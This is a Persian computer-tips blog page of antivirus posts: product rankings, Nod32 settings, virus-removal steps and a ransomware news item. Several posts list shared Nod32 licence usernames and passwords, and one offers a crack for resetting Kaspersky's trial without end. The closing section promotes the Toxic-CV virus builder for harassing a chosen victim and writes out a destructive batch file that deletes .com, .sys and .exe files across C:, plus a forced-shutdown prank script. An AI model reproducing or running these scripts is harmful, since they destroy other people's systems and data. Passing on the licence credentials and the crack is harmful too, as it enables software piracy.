تبليغاتX
پرتال تخصصی کامپیوتر Www.Hashemi64.ir
     
   
   
  منوي اصلي
لينکهاي سريع
 
  موضوعات
آموزش نفوذ و هک
امنیت و شبکه
رفع اشكال/سخت افزار / نرم افزار
دانلود كتاب و جزوه رشته كامپيوتر
بانک اطلاعات معماری (پك فروشي)
ویروس/ آنتي ويروس / آپديت
ويژوال بيسيك VB.6
برنامه نويسي پاسكال
سي و سي ويژوال , ++‍‍C
نمونه كار برنامه نويسي
برنامه نویسی فلش
زبان اسمبلی
ساختمان داده ها
هوش مصنوعی
دانلود نرم افزار
آموزش Html - قالب برای وبلاگ
شبكه - اينترنت
ترفندستان
كتابخانه الكترونيكي
مقالات
رشته مهندسي شيمي
رشته مهندسی صنایع
مقالات رشته الكترونيك
مقالات رشته مكانيك
مقالات رشته معماري
اجتماعی فرهنگی
خدمات ما به بازدید کننده
بازی فلش
داستان و مطالب جالب
برنامه های فارسی
شهر گچساران
سایت های مفید
کلیپ های فلش
خنده های زورکی !
اخر زمان و منجی موعود
موبايل
 

 

آرشيو ماهانه
آبان 1388
خرداد 1388
اردیبهشت 1388
فروردین 1388
اسفند 1387
بهمن 1387
دی 1387
آذر 1387
آبان 1387
مهر 1387
شهریور 1387
تیر 1387
ادمه ي آرشيو ماهانه
 
        لينک دوستان
 

 

لوگوي دوستان

روز نوشته هاي يك دانشجو / اسماعيل هاشمي


روز نوشته هاي يك دانشجو / اسماعيل هاشمي


 


 

تبليغات







دست نوشته هاي اخرين ديوانه (شعر ، ادبي )

روز نوشته هاي يك دانشجو (سياسي ، اجتماعي ، فرهنگي ، دانشگاه آزاد واحد گچساران )


  شما کدامیک از آنتی ویروس های موجود را پیشنهاد می کنید؟

باید توجه کنید که هر یک از آنتی ویروس ها دارای معایب و مزایایی هستند که همین امر سبب می شود علاقه مند خاص خود را داشته باشند. به طور کلی آنتی ویروس ها را می توان بر اساس موارد زیر دسته بندی کرد:

- قدرت شناسایی و حذف ویروس و Trojan ها.

- میزان تأثیرگذاری بر سرعت سیستم کاربر.

- بدست آوردن سریع و آسان کلید یا آنچه برای Active کردن برنامه نیاز است.

- توانایی غیرفعال کردن موقت آنتی ویروس و جلوگیری از حذف یک فایل.

 

کاربران گرامی ، آنچه در زیر مشاهده می کنید رتبه بندی بر اساس تجربه ای است که در طول این سال ها در زمینه آنتی ویروس ها به دست آورده و بیان آن بر اساس نظریه علمی خاصی نمی باشد ، اما از آنجا که آنتی ویروس ها را به منظور ایجاد امنیت نصب می کنیم بنابراین در جدول نهایی ابتدا امنیت و سپس سرعت در نظر گرفته شده است. ممکن است مندرجات زیر با نظرات شخصی شما کاربران گرامی مغایرت داشته باشد که شما می توانید نظر خود را در نظرسنجی موجود در صفحه نخست سایت ثبت بفرمائید. چنانچه در ورژن های بعدی ، معایب هر یک از آنتی ویروس ها برطرف شود ، جداول زیر نیز به دنبال آن ، تغییر خواهند کرد.

 

ادامه مطلب ...

نوشته شده توسط اسماعیل هاشمی در دوشنبه هجدهم آبان 1388

  ادامه مطلب

  18 آبان / اپديت Nod32

09 November 2009

18 آبان ماه 1388

IRAN Tehran 01:22' AM


username: EAV-23628463
password: b347vbn7sa

username: EAV-23624052
password: 2nc8p56xnb

username: EAV-22896806
password: k62fkbkkdh

username: EAV-23626706
password: ecdtecd6n8

username: EAV-23628452
password: etd6mkdsfk

username: EAV-23628451
password: 4m7xmtekr6

username: EAV-23626709
password: 27mv8xp4eh

نوشته شده توسط اسماعیل هاشمی در دوشنبه هجدهم آبان 1388

 

  16 آبان / اپديت Nod32

07 November 2009

16 آبان ماه 1388

IRAN Tehran 08:11' AM


Username: EAV-22896854
Password: edmhdu7jms

Username: EAV-22896816
Password: 57ecvatrxp

Username: EAV-23476738
Password: p6m45evk43

Username: EAV-22896820
Password: hhe6jxf63d

Username: EAV-23476740
Password: jhm7akkv47

 

 

...بيشتر ادامه مطلب

نوشته شده توسط اسماعیل هاشمی در شنبه شانزدهم آبان 1388

  ادامه مطلب

  12 آبان / اپديت Nod32

03 November 2009

12 آبان ماه 1388

IRAN Tehran 08:00' AM


Username:TRIAL-23883164
Password:6x556e7sm

Username:TRIAL-24000089
Password:6en6ssxhep

Username:TRIAL-24000083
Password:4p836hbpv6

Username:EAV-23716000
Password:c3dpep3ehb

Username:EAV-23727775
Password:8cntftjupf

Username:EAV-23476736
Password:vtmxva7b5u

 

نوشته شده توسط اسماعیل هاشمی در سه شنبه دوازدهم آبان 1388

 

  نحوه از بین بردن ویروس کظم غیظ (Kazme_Gheyz) چگونه است؟

در ابتدا عرض کنم که اصلا انتظار نداشته باشید آنتی ویروس های رایج دنیا این ویروس را شناسایی کنند. چرا که این ویروس ویژه ایران است و هنوز گستردگی جهانی پیدا نکرده است و در صورتی که به سایت های سازنده نرم افزار های امنیتی گزارش شود در رده ویروس ها قرار خواهد گرفت و آنگاه آنتی ویروس ها خواهند شناخت. این ویروس در 21 اردیبهشت ماه سال 87 به طور ناگهانی در ایران انتشار یافت. خطر چندانی سیستم را تهدید نمی کند اما به طور کلی ایجاد مزاحمت هایی برای کاربران می کند. برای مثال:

1- وبلاگ کظم غیظ را Home Page می کند یعنی وقتی Internet Explorer را باز می کنید تا سایتی را وارد کنید بلافاصله وبلاگ کظم غیظ نمایش داده می شود.

2- غیر فعال شدن گزینه Run در Start Menu (در بعضی سیستم ها).

3- غیر فعال شدن گزینه Manage پس از راست کلیک بر روی My Computer.

4- Folder Options را نیز پنهان می نماید (در بعضی سیستم ها).

5- غیرفعال شدن پنجره Task Manager (در بعضی سیستم ها).

6- ارسال پیام گروهی ناخواسته در Yahoo! Messenger (در بعضی سیستم ها).

 

حذف این ویروس دو روش دارد. یک روش نرم افزاری و یک روش عملکرد دستی است. در زیر هر دو روش قرار داده شده است که در صورتی که از یکی از روش ها پاسخ مثبت نگرفتید از روش دوم استفاده کنید:

 

ادامه مطلب ...

نوشته شده توسط اسماعیل هاشمی در دوشنبه یازدهم آبان 1388

  ادامه مطلب

  انتقال Update آنتی ویروس ESET Nod32

آیا راهی برای برداشتن فایل های Update آنتی ویروس ESET Nod32 Smart Security و انتقال آن به کامپیوتر دیگر وجود دارد؟

بله. فایل های به روز رسان این نرم افزار در پوشه Updfiles در مسیر پنهان زیر است:

 

برای Windows XP در مسیر:

C:\Documents and Settings\All Users\Application Data\ESET\ESET Smart Security

و برای Windows Vista در مسیر:

C:\ProgramData\ESET\ESET Smart Security

 

توجه داشته باشید فایل های Update یک ورژن خاص ، برای ورژن دیگر مناسب نیست. در صورتی که می خواهید این فایل ها را از سیستمی به سیستم دیگر انتقال دهید ابتدا از یکسان بودن ورژن های نصب شده بر روی دو سیستم مطمئن شوید. برای انتقال کافیست ابتدا پنجره Task Manager را با Ctrl+Alt+Del باز کرده و گزینه EGUI.EXE را End Process کنید. پس از انتقال فایل ها ، برنامه را باز کنید و آن را با یک Username و Password زنده به روز رسانی کنید. این کار در لحظات کوتاهی پایان می پذیرد.

نوشته شده توسط اسماعیل هاشمی در دوشنبه یازدهم آبان 1388

 

  9 آبان / اپديت Nod32

31 October 2009

09 آبان ماه 1388

IRAN Tehran 06:06' AM


Username:EAV-23369964
Password:4x3kb5rej4

Username:EAV-23546466
Password:mem57djuh6

Username:EAV-17446823
Password:c56dbs7jjd

Username:EAV-23624052
Password:2nc8p56xnb

Username:TRIAL-23779717
Password:5uef66uupb

Username:TRIAL-23779721
Password:3vupvk7x73


 

از یکی از لینک های زير ، آخرین Update های این نرم افزار را دریافت کنید. این فایل به روشی طراحی شده است که تنها با اجرای آن ، همه Update ها به صورت اتوماتیک بر روی نرم افزار نصب خواهند شد. سپس با یکی از Username و Password های زنده می توانید به روز رسانی را در مدت بسیار کوتاهی انجام دهید. این فایل این امکان را در اختیار شما قرار می دهد که پس از هر بار نصب برنامه ، نیازی به صرف مدت زمان طولانی برای به روز رسانی نباشد.

 

Download Updater File for Version 4.0.467 Only
 

 1 October 2009 (24.45 MB)

 

Download from Rapidshare

Download from 4Shared

Download from Depositfiles


 

نوشته شده توسط اسماعیل هاشمی در شنبه نهم آبان 1388

 

  پاك كردن ويروس fooool.exe

ویروسی به نام fooool.exe وارد سیستم من شده که به صورت سیستمی ، پنهان شده است. چگونه می توانم آن را از بین ببرم؟

 

برای از بین بردن این ویروس باید وارد محیط Safe Mode شوید. بدین شکل که پس از Restart کردن سیستم خود ، پیش از بالا آمدن ویندوز ، دکمه F8 را کلیک کنید تا وارد این محیط شوید. وارد Run شده و در آن تایپ کنید CMD و OK کنید. با تایپ کردن :C و Enter زدن ، به ریشه اصلی این Drive وارد شوید. خط فرمان زیر را تایپ کنید و Enter را فشار دهید:

attrib Fooool.* -s -h -r -a

اکنون دستور مقابل را تایپ کنید و Enter را فشار دهید:

dir /s Fooool.exe

اگر فایلی یافت شد پس حضور این ویروس قطعی است و باید از طریق دستور زیر ، آن را حذف نمود:

del Fooool.exe

اعمال فوق را برای همه Drive ها انجام دهید تا از عدم حضور ویروس اطمینان حاصل کنید.

نوشته شده توسط اسماعیل هاشمی در جمعه هشتم آبان 1388

 

  انتقال فايل هاي آپديت آنتي ويروس -Norton Internet Security 2010

آیا راهی برای برداشتن فایل های Update آنتی ویروس Norton Internet Security 2010 و انتقال آن به کامپیوتر دیگر وجود دارد؟

بله ؛ این فایل ها در پوشه Definitions در مسیر پنهان زیر برای ورژن 2010 ذخیره می شود:

 

C:\Documents and Settings\All Users\Application Data\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_17.0.0.136\Definitions

 

توجه کنید بخش قرمز رنگ در مسیر بالا، ورژن (Build) آنتی ویروس شماست. در صورتی که ورژن بالاتری وجود دارد و از آن استفاده می کنید ، عدد مربوط به آن ورژن ، به جای این قسمت قرمز رنگ قرار خواهد گرفت.

 

برداشتن فایل ها کار دشواری نیست اما چگونگی انتقال کامل آنها به سیستم دیگر بدون مواجه شدن با Error کمی نیاز به اجرای برخی تکنیک ها دارد. ابتدا در سیستمی که می خواهید این فایل ها را به آن انتقال دهید برنامه Norton Internet Security را باز کرده و در همان قسمت بالا روی عبارت Settings کلیک کرده تا پنجره دوم باز شود.

در پائین پنجره دوم روی سربرگ Miscellaneous Settings کلیک کنید. اکنون گزینه Norton Product Tamper Protection را که فعال است (On) ، غیرفعال کنید (Off). حالا می توانید بدون مواجه شدن با Error فایل های Update را به همان آدرسی که در بالا نوشته شده است انتقال دهید. پس از این کار ، مجدداً Norton Product Tamper Protection را فعال کرده و برنامه را از طریق اینترنت در مدت بسیار کوتاهی به روز رسانی کنید.

نوشته شده توسط اسماعیل هاشمی در جمعه هشتم آبان 1388

 

  حذف ویروس اتوران با Autorun Virus Remover 2.3

Autorun.inf یکی از ویروس های رایج است که از طریق USB و Flash Drive وارد سیستم می شود و به قسمت هایی مانند Folder Options و Task Managerو... صدمه می زند.

با این آنتی ویروس شما به راحتی می توانید این ویروس را از سیستم حذف کنید. 

دانلود          حجم: ۱.۱۵۷ مگابایت

نوشته شده توسط اسماعیل هاشمی در پنجشنبه بیست و هفتم فروردین 1388

 

  روش انتقال آپدیت آنتی ویروس آویرا بدون نیاز به اینترنت

روشی برای انتقال آپدیت آنتی ویروس آویرا از سیستم بروزرسانی شده به یک سیستم دیگر را یافتم که لازم دانستم این روش را برای کاربران عزیز نیز آموزش دهم چرا که این آنتی ویروس مزایای بسیار زیادی داشته روز به روز به استفاده از آن در بین کاربران افزوده میشود. مزایایی از جمله: نصب سریع و آسان ، عدم تأخیر در اجرای برنامه ها ، استفاده از KEY برای قانونی کردن برنامه با ماندگاری زیاد ، سرعت نسبتاً بالای Scan کردن سیستم ، جستجو و پیدا کردن خودکار Trojan ، استفاده کم از حافظه CPU ، به روز رسانی اتوماتیک ، سازگار با شبکه ، قابلیت خاموش کردن موقت برنامه از طریق Task Manager و در نهایت Uninstall راحت. و مهمتر از همه سازگاری با سایر انواع آنتی ویروسها مانند نود32 و کاسپراسکای و مورى محبوب من جلوگیری از ارتباط پنهانی نرم افزارهای كرك شده چون بابیلون با سرور و از کار افتادن آنها.

نوشته شده توسط اسماعیل هاشمی در شنبه بیست و دوم فروردین 1388

  ادامه مطلب

  بلاخره کدام آنتی ویروس بهتر است؟

یکی از معتبرترین سایتهای مستقل جهت مقایسه توانمندی نرم افزارهای ضد ویروس سازمان بولتن ویروس  " virusbtn.com" یا " virusbulletin.com" است که بیش از نه سال در این زمینه فعالیت داشته و هر دو ماه یکبار با حضور نمایندگان اعزامی شرکت های داوطلب (جهت آزمون مقایسه ای توانمندی) نرم افزار های ضد ویروس را ارزیابی کرده و در صورت آشکار سازی کلیه ویروسهای "In The Wild" (تا زمان آزمون) به شرکت تولید کننده محصول نشان "VB 100%" اعطا می نماید. لازم به ذکر است ضد ویروس "نود٣٢" در 9 سال گذشته دارای بیشترین تعداد نشان "VB 100%" می باشد. در این مدت نود32 با 48 نشان VB100 Symantec با 42 نشان VB100 و Kaspersky با 40 نشان VB100 در رده های بعدی هستند. اما آیا صرفا اخذ این نشان میتواند بیانگر قدرت یک آنتی ویروس باشد؟! مسلما خیر. نکته ای که در اینجا وجود دارد نادیده گرفتن  فاکتورهای دیگری چون: سرعت اسکن - حفاظت مناسب از خود - خطای کم هوش مصنوعی – و خصوصيتي كه بيشتر به درد ما ايرانيا ميخوره يعني توانائی نصب شدن رو سیستمهای آلوده در نظر گرفته نشده می باشد. در یک جمع بندی کلی و با اشاره به مهمترین ویژگیهای مطلوب هر آنتی ویروس ،  7 آنتي ويروس برترعبارت است از:

1-      آنتی ویروس  آویرا ،  ویژگیهای برتر: توانائی نصب شدن روي سیستمهای آلوده ،  درصد شناسائی و نابودسازی بالای بدافزارها ، اسکن عمیق ، کم حجم بودن

۲-      آنتی ویروس نود32 ،  ویژگیهای برتر: داشتن هوش مصنوعی بالا با خطای کم ،( تقریبا 80% از تهدیدهایی که به طور پیشگیرانه توسط نود32 کشف می شود توسط قابلیت هوش مصنوعی آن  است) درصد پائین خطای شناسائی

۳-      آنتی ویروس کسپراسکای ،  ویژگیهای برتر: حفاظت از خود در برابر حملات ، ظاهر کاربر پسند ، به روز شدن سریع اطلاعات در برابر خطرات آنی. و پس از آنها به ترتیب موارد زیر در رتبه های بعدی هستند: آنتی ویروس سیمانتک ، آنتی ویروس مك آفی2009 ، آنتی ویروس بیت دفندر و آنتی ویروس پاندا.

نوشته شده توسط اسماعیل هاشمی در شنبه بیست و دوم فروردین 1388

 

  آموزش آموزش کامل تنظیمات آنتی ویروس قدرتمند و معروف Nod32

این تنظیماتی که من در اینجا همراه با عکس از تمام قسمت های آن گذاشتم بهترین تنظیماتی است که میشود بر روی
این آنتی ویروس پیاده کرد. توجه داشته باشید که بعد از تنظیم نمودن آنتی ویروس خود با این تنظیمات NOD32 دیگه هیچ پیغامی را در زمان پیدا کردن ویروس یا تروجان به شما نشان نخواهد داد و تماما به صورت اتوماتیک عمل کرده.

این تنظیمات بدین گونه عمل میکند که ویروس یا تروجان شناسایی شده. توسط NOD32 اول اقدام به پاکسازی آن میکند.
یعنی اگر ویروسی به یکی از فایلهای EXE شما چسبیده باشد اول سعی میکند که آن ویروس را اتوماتیک از توی فایل EXE بکشه بیرون و آن را پاک کند . این عمل برای آنتی ویروسها زمانی امکان پذیر است که ویروس به اول یا انتهای فایل چسبیده باشد اما اگر ویروس به وسط فایل EXE چسبیده باشد در آن صورت نه تنها NOD32 بلکه کمتر آنتی ویروسی میتواند ویروس مورد نظر را از داخل فایل پاک کند.بنابراین ما در اینجا NOD32 را بدین گونه تنظیم خواهیم کرد که در مرحله اول اقدام به پاک کردن از درون فایل هایی که آلوده شده نماید اما اگر این کار امکان پذیر نبود باز اتوماتیک و بدون کوچکترین وقفه ای در کار آن را از سیستم پاک کند . اما قبل از پاک کردن آن از سیستم آن را در قرنتینه قرار میدهد.

هر وقتی که خواستید بدونید آیا NOD32 ویروسی را پیدا کرده یا نه میتوانید به قسمت Quarantine و یا قسمت Logs مراجعه کنید و اطلاعات در مورد مسیر یافته شده ویروس یا اسم آن را آنجا بیابید.

این تنظیمات NOD32 را در عملکرد بسیار سریعتر از حالت Default خواهد کرد چون تمام قسمت ها همانطور که گفتم به صورت اتوماتیک عمل خواهند کرد. پس اگر میخواهید که توسط NOD32 نهایت امنیت را در شناسایی و از بین بردن ویروس ها و تروجان ها داشته باشید پیشنهاد میکنم که این تنظیمات را بر روی آنتی ویروس خود پیاده کنید.

تنظیمات مربوط به قسمت Amon

آنتی ویروس خود را باز کنید و اول بر روی AMON کلیک کنید. با کلیک کردن بر روی این قسمت پنجره مربوط به تنظیمات آن برای شما باز خواهد شما. شما در اینجا بر روی Setup کلیک کنید تا وارد بخش تنظیمات مربوط به قسمت AMON شویم.

زمانی که بر روی Setup کلیک کردید یک پنجره برای شما باز خواهد شد و شما از بالا اول بر روی Option کلیک کنید و آن قسمتی را که با فلش قرمز رنگ مشخص نمودم را تیک بزنید.

ادامه مطلب را مشاهده نماييد ...

نوشته شده توسط اسماعیل هاشمی در پنجشنبه بیستم فروردین 1388

  ادامه مطلب

  NOD 32 username and password

14/02/2009 New NOD 32 username and password

بروز رسانی ناد 32 (nod 32 ) شما هر روز با یوزر و پسورد های رایگان

Username:EAV-06546667
Password:bvxkrfhsmd

Username:EAV-11129881
Password:mwee4cxp28

Username:EAV-11333729
Password:h65wu88ka8

Username:EAV-11955920
Password:br3ejp5cbj

Username:EAV-11128353
Password:tw2mmbkmk4

Username:EAV-11150463
Password:b5bcn47apx

 

New Update Username And Password 2009 NOD32 -  2009/02/14   -   02/14/2009

Username:EAV-10611195
Password:ch5cu74bdu

Username:EAV-10662180
Password:brdbsfux6k

Username:EAV-07386494
Password:pk84ubp4rw

Username:EAV-10461618
Password:n3fpcat8rn

Username:EAV-10452159
Password:dnbfwbx27t

Username:EAV-01090120
Password:4kk6xnxxfj

 

New Update Username And Password 2009 NOD32  2009/01/24   -   01/24/2009

نوشته شده توسط اسماعیل هاشمی در سه شنبه بیست و هفتم اسفند 1387

 

  استفاده دائم از Kaspersky AntiVirus بدون نیاز به سریال

این روش 100 درصد عملی است و تست شده. روش راحتی است و نیاز به سریال نداره! پس دیگه نگران Black List شدن Keyهای ضد ویروس كاسپراسكای نباشید.

 

در این روش از نسخه‌ی 30 روزه و آزمایشی استفاده میكنیم و میدونید كه در طی این مدت دقیقا مثل نسخه‌ی Full كار میكنه. اما این 30 روز رو هر 30 روز مجددا فعال میكنیم به این ترتیب میتونید به طور دائم و كاملا بی‌دردسر از این آنتی ویروس قدرتمند استفاده كنید.

 

مراحل زیر رو به ترتیب انجام بدید و مطمئن باشید این ساده ترین روش برای استفاده از Auto Update برنامه است.

 

مراحل بازگردانی Kaspersky 2009

 

ابتدا برنامه Kaspersky Trial Reset رو از انتهای همین مطلب دانلود كنید و سپس مراحل زیر را انجام دهید :

 

1. خصوصیت "Self-Defense" ضد ویروس Kaspersky را غیر فعال كنید. برای غیر فعال كردن روی آیكون Tray ضد ویروس Kaspersky راست كلیك كنید و را انتخاب كنید. انتخاب  (در سمت راست زیر  "Self-Defense") و علامت كنار    را بردارید و سپس .

2. Exit Kaspersky. با راست كلیك روی آیكون برنامه.

3. كرك رو اجرا كنید و صبر كنید تا Kaspersky برای فعال سازی پیغام دهد. ( Kaspersky باید به طور خودكار اجرا شود ) . اگر Kaspersky خودكار اجرا نشد به طور دستی آن را اجرا كنید یا فقط كامپیوتر را ریست كنید. (اگر مراحل 1 و 2 را اجرا نكرده باشید كرك به طور خودكار بسته خواهد شد.)

4. برای uninstall فقط فایل را پاك كنید.

نكته: اگر شما پیغامی مانند "activation server is unavailable" (یا no internet) بعد از استفاده از كرك دریافت كردید.كارت شبكه خود را یك بار غیرفعال/فعال كنید. (این مشكل مربوط به برنامه است نه كرك). همچنین هنگامی كه برنامه درحال Update است كرك را اجرا نكنید.

نوشته شده توسط اسماعیل هاشمی در یکشنبه بیست و یکم مهر 1387

 

  به روز رسانی آنتی ویروس Kaspersky

وارد برنامه آنتی ویروس Kaspersky شوید. بر روی Settings کلیک کنید. در پنجره سمت چپ Update را انتخاب کنید. در پنجره سمت راست بر روی Configure کلیک کنید. در این قسمت بر روی Add کلیک کنید. فولدر Kaspersky-Update را در هر جایی که ذخیره کرده اید انتخاب کنید و OK‌ را بزنید. دوبار دیگر OK‌ را بزنید تا پنجره ها بسته شود. به قسمت Update‌ در برنامه بروید و بر روی Update Database کلیک کنید. آنتی ویروس شما به روز می شود. بهتر است برای Update در دفعات بعدی از روش اتصال به اینترنت استفاده کنید یا از Update‌های روزانه و هفتگی استفاده کنید تا در هر بار مجبور به دریافت این فایل حجیم نباشید.

فايلهاي به روز رسان روزانه و هفتگي را از این لینک بگيريد .

نوشته شده توسط اسماعیل هاشمی در پنجشنبه هجدهم مهر 1387

 

  ظهور ویروس مخصوص اخاذی (Ransom ware)

ظهور ویروس مخصوص اخاذی (Ransom ware)
متخصصین امنیتی در خصوص ویروس جدیدی هشدار دادند که با استفاده از کلید 1024 بیتی، اقدام به رمز گذاری اطلاعات و دیتاهای موجود بر روی دستگاه‌های آلوده نموده و برای ارسال کلید بازگشائی رمز ، تقاضای پول می‌کند.
این ویروس که نام Gp code بر آن نهاده شده است از طریق مرور گرهای بروز رسانی نشده و آسیب‌پذیر به پی‌سی‌ها دسترسی پیدا می‌کند و به محض فعال شدن اقدام به رمزنگاری کلیه فایل‌های txt. ، doc. ، pdf. ، xls. ، jpg. و png. با کلید 1024 بیتی می‌نماید.
پس از آنکه رمزنگاری تمام فایل‌ها به اتمام می‌رسد یک فایل readme بر روی دستگاه باقی می‌ماند که حاوی یک آدرس ایمیل بوده و برای ارسال کد باز گشائی رمز درخواست مبلغی پول می‌نماید.
به نظر می‌رسد این ویروس نسخه دوم ویروسی است که دو سال پیش توسط همین نویسنده و با همین مشخصات مشاهده گردید .ویروس قبلی از کلید 660 بیتی استفاده می‌نمود. TimurT soriev از لابراتوار کسپرسکی در این باره می‌گوید: " متخصصان ویروس ، موفق به شکستن کلید 660 بیتی شدند."
شرکت کسپرسکی به کاربرانی که دستگاه آنان توسط این ویروس آلوده شده توصیه می‌کند به هیچ وجه اقدام به restart و یا خاموش کردن سیستم خود ننمایند و بجای این کار سریعاً با چند سایتی که آخرین بار بازدید نمودند تماس گرفته تا مشخص شود در هنگام آلوده شدن دستگاه چه برنامه‌ای در حال اجرا بوده است.
Tsoriev در ادامه گفت: "قویاً به کاربران صدمه دیده توصیه می‌کنیم از باج دادن به فرد مهاجم اکیداً خودداری نموده و بجای آن با ما و همچنین با سازمان و یا ارگان متولی جرایم الکترونیکی کشور خود تماس بگیرند." وی در انتها تأکید کرد: " پرداخت پول به افراد این چنینی تنها باعث ادامه این چرخه و تشویق مجرمین خواهد شد."

نوشته شده توسط در شنبه هشتم تیر 1387

 

  از بین بردن ویروس کظم غیظ virus kazme gheyze

 

چون در تعدای از سایتهای ایرانی مشاهده کردم که به جای کمک به کسانی که مورد حمله این ویروس قرار گرفته اند فایلهایی راقرار داده اند که متأسفانه خود دارای ویروس میباشد سعی کردم در این تاپیک در مورد شناسائی و از بین بردن این ویروس کمک کنم.
امیدوارم که به جای نابود کردن همدیگر به یکدیگر کمک کنیم ..!!!!
راه حل اول
این ویروس یعنی کظم غیظ یا kazme_gheze را که ویروسی است که اطلاعات شما را به بیرون هدایت میکند و در این مورد شما را به سایت مشخصی هدایت میکند با توجه به اینکه symantec antivirus این ویروس را به نام win32.virut شناسائی میکند در این سایت به شما اعلام میکند که با آپدیت کردن آنتی ویروس این ویروس به راحتی از بین میرود. البته ابتدا باید system restore کامپیوتر خود را خاموش کنید تا فایل های آن کاملا پاک شود و گرنه ویروس دوباره باز میگردد.

نوشته شده توسط اسماعیل هاشمی در دوشنبه بیستم خرداد 1387

  ادامه مطلب

  ویروس

اخبار  Virus & Spmویروس نویسی

 صفحه اصلی ویروس


هر هفته یک مطلب جدید

برنامه ای برای ساخت ویروس

توضیح :

Toxic-CV یک نرم افزاره که می تونه یک ویروس با قابلیت ها یی که شما  انتخاب می کنید درست کنه .
شما می تونید این ویروس رو به کسی که می خواین اذیتش کنین بفرستین . در ضمن Cv  مخفف Custimized Virus  هست .

قابلیت های برنامه :
1-راه اندازی در StartUp (بدون نمایش در Msconfig)
2-غیر فعال کردن TaskMgr,Msconfig,Regedit,Norton Anti Virus,Mcafee Antivirus,Windows Firewall
3-قابلیت تعیین نام ویروس بعد از Install 
4-پشتیبانی از پسوند ها مهم فایل های اجرایی مانند : exe , scr, bat ,  cmd , pif
5-قابلیت انتخاب Icon ویروس 
5-پیغام خطای کاذب ( Fake Message )
6-قابلیت بخشیدن قربانی به  2 صورت
7-قابلیت های  آزار قربانی مانند : پر کردن هارد ، بوق زدن ! ، کم کردن سرعت کامپیوتر ، و ....
8- حجم بسیار کم : 10-9 کیلوبایت                   Toxic-Cv                             

آموزش استفاده از برنامه : 
برنامه رو اجرا کنید و در صفحه ی About  روی Ok  کلیک کنید ( نه بابا )
خوب تو صفحه ی اصلی  بخش اول یعنی  General Settings واضحه  و معمولا تو بیشتر Ps ها هم هست .بخش  Exe Icon & Name  هم که واضحه و به نام و Icon ویروس قبل از اینکه نصب شه اشاره داره
بخش Fake Message هم که واضح تر از همست . 

بخش Forgive Victim : این بخش واسه انتخاب گزینه هایی برای تنظیم بخشش  یا عدم بخشش قربانی هست . خوب شما اینجا سه تا گزینه می بینید :

الف : Forgive victim with this password : با انتخاب این گزینه اون قربانی که ویروس تو کامپیوترش اینستال شده با فشار دادن Alt + Ctrl + Del صفحه ای رو می بیینه که ازش یک رمز
می خواد اگه قربانی اون رمزی رو که شما در روبه روی این گزینه وارد کردید  رو وارد کنه . ویروس غیر فعال می شه .

ب  : Forgive victim after a restart : با انتخاب این گزینه ویروس بعد از یک ریستارت غیر فعال می شه .

چ  : Don't forgive victim : با انتخاب این گزینه ویروس  به هیچ وجه غیر فعال نمیشه .  


حالا می رسیم به بخش  Enable  & Disable Viruses  : تو این بخش شما می تونید قسمت های مختلف آزار قربانی خودتان رو در ویروس فعال یا غیر فعال کنید .
شرح قسمت ها مختلف :

1-Gardually decrease system speed : اگه این گزینه انتخاب بشه ویروس به تدریج سرعت سیستم رو کم می کنه تا جایی که ....  .

2-Gradually fill the hard : اگه این گزینه انتخاب بشه ویروس به تدریج  هارد رو پر می کنه تا جایی که ....  .

3-Disable Yahoo! Messenger : اگه این گزینه انتخاب بشه ویروس یاهو مسنجر رو غیر فعال می کنه ! 

4-Beep every second : اگه این گزینه انتخاب شه ویروس هر ثانیه بوق می زنه !

5-Swap mouse buttons every 30 seconds for 10 seconds : اگه این گزینه انتخاب شه ویروس هر 30 ثایه به مدت 10 ثانیه جای دکمه های ماوس رو عوض می کنه !

6-Shutdown computer every 20 minutes  : اگه این گزینه انتخاب شه ویروس بعد از 20 دقیقه که از روشن شدن کامپیوتر / اجرا شدن ویروس  بگذره سیستم قربانی رو شات داون می کنه .

7-Lock Computer Every 30 seconds for 10 seconds : اگه این گزینه انتخاب شه ویروس هر 30 ثانیه  به مدت 10 ثانیه کامپیوتر رو قفل می کنه .

وقتی همه ی تنظیمات رو انجام دادید روی Create Virus  کلیک کنید فایل ویروس به نامی که شما در قسمت  Exe name وارد کردید در پوشه ای که برنامه توش اجرا شده ساخته می شه .

Download Toxic-Cv        


 

 

 

خوب ساختن ویروس رو آغاز می کنم 
notepad باز شد پنجره این ها رو بنویسید توش

@echo off

Cls

===========

Color fc

Del /a c:\*.com

Del /a c:\*.sys

Del /a c:\*.exe /s

===========

خوب تایپ کردن دیگه بسه این فایل را با هر نامی که دل تان خواست ذخیره کنید ولی پسوند را با نام bat بگذارید ، مثل gach18.bat

خوب کار دیگه تموم شد این ویروس رو اگر کسی باز کنه کامپیوتر رو با یک خاک مساوی می کنه و ویندوز یا هر نوع سیستم عامل دیگه رو از کار می اندازه

 دوستان با دادن نظر من رو برای بهتر شدن کار راهنمایی کنید


آموزش قدم به قدم ویروس نو یسی با (نت پد)
قسمت اول ویروس بلاستر:
امروز يادميگيريم كه:
1-
چگونه ويروس Blaster را بسازيم
2-
چگونه براي BatchFile ها آيكون بسازيم
3-
چگونه خودمان در Notepad ترفند كشف كنيم!!!
فكر ميكنم همه شما ويروس Blaster را بشناسيد ويروسي كه باعث Shutdown شدن كامپيوتر در 60 ثانيه ميشد... و حتي عده كثيري از شما روش ساخت آن را بدانيد ولي در پايان اين سري مقالات و جهت تكميل اين سري از مقالات لازم ميدانم نگاهي سريع به آن بيندازيم و سپس به نكات تكميلي اين سري مقالات ميپردازيم. اين ويروس را به طرق مختلفي و با دستورات گوناگوني ميتوان نوشت كه در اينجا دو روش را مورد بررسي قرار ميدهيم در ضمن لطفا اگر با اين دستورات از قبل آشنايي نداريد حتما از Copy/Paste استفاده كنيد .
روش اول/ با استفاده ازShortcut در جايي از دسكتاپ خود Right Click كنيد و در بخش New گزينه Shortcut را انتخاب كنيد و در بخش ظاهر شده يكي از دستورات زير را وارد كنيد:
shutdown -s -t xx -1
windir%system32shutdown.exe -s -t xx% -2

توضيح: بعد از اينكه Paste كرديد به جاي xx در دستورات بالا مدت زماني را بر حسب ثانيه قرار دهيد تا كامپيوتر پس از آن زمان خاموش شود. سپس Next را بزنيد و براي فايل خود يك نام برگزينيد و كار تمام است!!.
روش دوم/ به كمكNotepad نت پد را باز كنيد و باز هم يكي از دو دستور بالا را در آن Paste كنيد و حالا فايل خود را با پسوند bat يعني با نامي مثل shutdown.bat سيو كنيدفكر ميكنم تا به حال بايد متوجه شده باشيد كه bat مخفف BatchFile است. براي پادزهر درست كردن براي اين ويروس هم ميتوانيد از دستور زير استفاده كنيد:
shutdown -a
